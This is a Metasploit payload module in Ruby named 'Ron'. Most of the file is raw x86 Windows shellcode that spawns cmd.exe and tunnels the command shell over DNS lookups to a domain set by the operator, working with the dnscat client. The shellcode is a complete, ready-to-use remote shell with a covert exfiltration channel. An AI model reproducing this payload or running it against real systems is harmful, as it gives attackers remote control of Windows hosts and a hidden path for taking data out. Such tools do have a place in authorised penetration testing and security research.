##
# This is an experimental script that requires the dnscat client, found at
# http://www.skullsecurity.org/wiki/index.php/Nbtool
#
# Released under the Metasploit license. 
##

require 'msf/core'

module Metasploit3

	include Msf::Payload::Windows
	include Msf::Payload::Single

	def initialize(info = {})
		super(update_info(info,
			'Name'          => 'Ron',
			'Version'       => '0.04',
			'Description'   => 'Spawn a commandshell over DNS',
			'Author'        => [ 'Ron' ],
			'License'       => MSF_LICENSE,
			'Platform'      => 'win',
			'Arch'          => ARCH_X86,
			'Payload'       =>
				{
					'Offsets' =>
						{
						},
					'Payload' =>
    "\xe9\xa2\x01\x00\x00\x5d\x81\xec\x00\x04\x00\x00\xe8\x51\x03\x00" +
    "\x00\x31\xdb\x80\xc3\x09\x89\xef\xe8\x31\x03\x00\x00\x80\xc3\x06" +
    "\x8d\x55\x54\x8d\x7d\x24\xe8\x1f\x03\x00\x00\xfe\xc3\x8d\x55\x60" +
    "\x8d\x7d\x3c\xe8\x12\x03\x00\x00\x8d\x4c\x24\x04\x66\x81\x4c\x24" +
    "\x06\x10\x10\xc7\x01\x20\x00\x00\x00\x51\x81\xc1\x04\x00\x00\x00" +
    "\x51\x31\xc9\x51\x51\x51\x80\xc1\x06\x51\xff\x55\x3c\x8b\x44\x24" +
    "\x0c\x89\x45\x74\x8d\x4c\x24\x04\x51\x31\xc9\x66\x81\xc1\x02\x02" +
    "\x51\xff\x55\x24\x50\x04\x02\x50\x50\xff\x55\x34\x89\x45\x40\x8d" +
    "\x4c\x24\x04\x51\x68\x7e\x66\x04\x80\x50\xff\x55\x38\x8d\x7c\x24" +
    "\x04\x31\xc9\x80\xc1\x19\xf3\xab\x80\xc1\x0b\x88\x4c\x24\x60\x88" +
    "\x4c\x24\x58\x8d\x5c\x24\x58\x8d\x75\x48\x8d\x7d\x50\x31\xc9\x51" +
    "\x53\x56\x80\xc1\x04\x29\xce\x56\xff\x55\x08\x31\xc9\x51\x53\x57" +
    "\x80\xc1\x04\x29\xcf\x57\xff\x55\x08\x8b\x36\x8b\x7f\x04\x31\xd2" +
    "\x80\xca\x44\x89\x54\x24\x04\x31\xc0\xfe\xc4\x89\x44\x24\x30\x89" +
    "\x74\x24\x3c\x89\x7c\x24\x40\x8d\x4c\x14\x04\x51\x29\xd1\x51\x31" +
    "\xd2\x52\x52\x68\x00\x00\x00\x08\x42\x52\x53\x53\x8d\x4d\x6c\x51" +
    "\x4a\x52\xff\x55\x0c\xff\x75\x50\xff\x55\x04\x31\xdb\x8d\x4c\x24" +
    "\x04\x8d\x54\x24\x08\x53\x53\x51\x80\xc3\x04\x53\x52\xff\x75\x4c" +
    "\xff\x55\x1c\x85\xc0\x74\x79\x8b\x4c\x24\x04\x85\xc9\x8d\x4c\x24" +
    "\x04\x8d\x54\x24\x08\x74\x25\x31\xdb\x53\x51\x80\xc3\x1f\x53\x52" +
    "\xff\x75\x4c\xff\x55\x14\x85\xc0\x74\x56\x8d\x4c\x24\x08\x8b\x54" +
    "\x24\x04\xe8\x2e\x01\x00\x00\xe9\x04\x00\x00\x00\x31\xdb\x89\x19" +
    "\x8b\x45\x74\x8b\x5d\x40\x8d\x4c\x24\x08\x8b\x54\x24\x04\xd1\xe2" +
    "\xe8\xaa\x01\x00\x00\x31\xdb\x8d\x4c\x24\x08\x53\x80\xc7\x02\x53" +
    "\x51\xff\x75\x40\xff\x55\x2c\x85\xc0\x7e\x0c\x8d\x74\x24\x14\x8b" +
    "\x7d\x48\xe8\x8d\x00\x00\x00\x53\xff\x55\x20\xe9\x6b\xff\xff\xff" +
    "\x81\xc4\x00\x04\x00\x00\xc3\xe8\x59\xfe\xff\xff\x8e\x4e\x0e\xec" +
    "\xfb\x97\xfd\x0f\x80\x8f\x0c\x17\x72\xfe\xb3\x16\x7e\xd8\xe2\x73" +
    "\x16\x65\xfa\x10\x1f\x79\x0a\xe8\x11\xc4\x07\xb4\xb0\x49\x2d\xdb" +
    "\xcb\xed\xfc\x3b\xa9\x69\xa6\x5f\xb6\x19\x18\xe7\xa4\x1a\x70\xc7" +
    "\x6e\x0b\x2f\x49\x08\x92\xe2\xed\x3e\xc7\x1c\x29\x41\x41\x41\x41" +
    "\x42\x42\x42\x42\x43\x43\x43\x43\x45\x45\x45\x45\x46\x46\x46\x46" +
    "\x77\x73\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x00\x00\x64\x6e\x73\x61" +
    "\x70\x69\x2e\x64\x6c\x6c\x00\x00\x63\x6d\x64\x2e\x65\x78\x65\x00" +
    "\x49\x49\x49\x49\x31\xc9\x46\x38\x0e\x75\xfb\x80\xc1\x05\x01\xce" +
    "\xf6\x06\x80\x75\x07\x46\x80\x7e\x01\x00\x75\xf9\x31\xc9\x80\xc1" +
    "\x15\x02\x4e\x13\x01\xce\x8a\x1e\x80\xe3\x0f\x84\xdb\x74\x35\xfe" +
    "\xcb\x46\x0f\xb6\x1e\x46\x4b\x8a\x26\x46\x4b\x8a\x06\x66\x25\xdf" +
    "\xdf\x66\x2d\x41\x41\xc0\xe4\x04\x08\xe0\x88\x45\x00\x31\xd2\x52" +
    "\x8d\x4d\x08\x51\x42\x52\x55\x57\xff\x55\x18\x85\xdb\x75\xd6\xe9" +
    "\xc7\xff\xff\xff\xc3\x8d\x3c\x12\x4a\x8a\x24\x11\x8a\x04\x11\xc0" +
    "\xec\x04\x24\x0f\x66\x05\x41\x41\x4f\x88\x04\x39\x4f\x88\x24\x39" +
    "\x85\xd2\x75\xe4\xc3\x5e\x8d\x7e\x10\x89\x46\x04\x56\x57\x84\xd2" +
    "\x74\x1b\xc6\x47\x16\x31\x88\x57\x17\x89\xce\x81\xc7\x18\x00\x00" +
    "\x00\x89\xd1\xf3\xa4\x8d\x52\x1c\xe9\x0f\x00\x00\x00\x81\xc7\x16" +
    "\x00\x00\x00\xc6\x07\x30\x47\xba\x1b\x00\x00\x00\xe9\xeb\x00\x00" +
    "\x00\x5e\xfe\x46\x01\x80\x7e\x01\x7a\x7e\x04\xc6\x46\x01\x61\x31" +
    "\xc9\x8a\x04\x0e\x88\x04\x0f\x41\x42\x84\xc0\x75\xf4\x31\xc0\xfe" +
    "\xc4\x66\x89\x44\x0f\x02\x80\xc4\x04\x66\x89\x04\x0f\x5f\x5e\x31" +
    "\xc0\x04\x10\x50\x56\x30\xc0\x50\x52\x57\x53\xff\x55\x28\xc3\xe8" +
    "\x81\xff\xff\xff\x02\x00\x00\x35\x41\x41\x41\x41\x41\x41\x41\x41" +
    "\x41\x41\x41\x41\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" +
    "\x06\x64\x6e\x73\x63\x61\x74\x01\x30\x01\x52\xff\x55\x00\x89\xc2" +
    "\xff\x74\x9f\xfc\x52\xe8\x1f\x00\x00\x00\x89\x44\x9f\xfc\x4b\x75" +
    "\xef\xc3\x56\x31\xf6\x64\x8b\x46\x04\x8b\x40\xe4\x48\x66\x31\xc0" +
    "\x66\x81\x38\x4d\x5a\x75\xf5\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45" +
    "\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" +
    "\x37\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74" +
    "\x0a\xc1\xcf\x0d\x01\xc7\xe9\xf1\xff\xff\xff\x3b\x7c\x24\x28\x75" +
    "\xde\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b" +
    "\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2\x08\x00\xe8\x10\xff\xff" +
    "\xff\x01\x61" # Note: no domain name given (just "a.")
				}
			))

		# We don't support an EXITFUNC yet, we simply return (and likely crash)
		deregister_options('EXITFUNC')

		# Register the domain option
		register_options(
			[
				OptString.new('DOMAIN', [ true, "The domain name to use for lookups (eg, skullseclabs.org)" ])
			], self.class)
	end

	#
	# Constructs the payload
	#
	def generate_stage
		domain = ''
		(datastore['DOMAIN'] || '').split('.').each(){ |sub| domain = domain + sub.length.chr + sub }
		domain = domain + 0.chr

		return module_info['Payload']['Payload'] + domain
	end

end